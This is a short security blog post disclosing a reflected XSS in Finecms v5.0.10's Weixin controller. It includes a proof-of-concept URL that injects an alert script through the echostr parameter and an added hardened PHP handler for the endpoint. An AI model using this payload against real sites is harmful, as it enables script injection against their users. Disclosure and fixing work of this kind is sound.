朝花夕拾|勿忘初心

Finecms Weixin reflected XSS

Category: Code Audit. Author: Lucifaer (site owner). Please credit the source when reposting this article.

Today I found a reflected XSS in Finecms v5.0.10.

Technical Description:

The index function in the file /finecms/dayrui/controllers/Weixin.php places no restrictions on its input, which can result in XSS.

PoC

Visit the following URL:

http://localhost:9999/index.php?c=weixin&m=index&nonce=1&timestamp=1&signature=17ba0791499db908433b80f37c5fbc89b870084b&echostr=<script>alert('1')</script>
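
A hardened form of this kind of endpoint, as an added example that is not code from Finecms or from the original post. It assumes the standard WeChat URL-verification scheme (signature = SHA-1 of the sorted token, timestamp and nonce); `WEIXIN_TOKEN`, `weixin_signature` and `weixin_verify` are hypothetical names, and the alphanumeric limit on `echostr` is an assumption.

```php
<?php
// Added example: hypothetical WeChat URL-verification handler, not Finecms code.
// WEIXIN_TOKEN is a constructed placeholder for the token set in the WeChat console.
const WEIXIN_TOKEN = 'example-token';

/** Recompute the signature: SHA-1 of token, timestamp and nonce, sorted and joined. */
function weixin_signature(string $token, string $timestamp, string $nonce): string
{
    $parts = [$token, $timestamp, $nonce];
    sort($parts, SORT_STRING);
    return sha1(implode('', $parts));
}

/**
 * Return the body to send for a verification request, or null to reject it.
 * The signature does not cover echostr, so that value is still untrusted
 * after the check and has to be constrained before it is echoed.
 */
function weixin_verify(array $query, string $token): ?string
{
    foreach (['signature', 'timestamp', 'nonce', 'echostr'] as $key) {
        if (!isset($query[$key]) || !is_string($query[$key])) {
            return null; // missing or array-typed parameter
        }
    }
    $expected = weixin_signature($token, $query['timestamp'], $query['nonce']);
    if (!hash_equals($expected, $query['signature'])) {
        return null; // constant-time comparison failed
    }
    // Assumption: legitimate echostr values are short alphanumeric strings.
    if (!preg_match('/\A[A-Za-z0-9]{1,64}\z/', $query['echostr'])) {
        return null;
    }
    return $query['echostr'];
}

if (PHP_SAPI !== 'cli') {
    // text/plain plus nosniff keeps a browser from rendering the echo as HTML.
    header('Content-Type: text/plain; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    $body = weixin_verify($_GET, WEIXIN_TOKEN);
    if ($body === null) {
        http_response_code(403);
        exit('invalid request');
    }
    echo $body;
}
```

If the response has to stay `text/html`, passing the value through `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` before output is the equivalent control.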

Tag: Audit
Last modified by Lucifaer on 2017-08-17 18:45
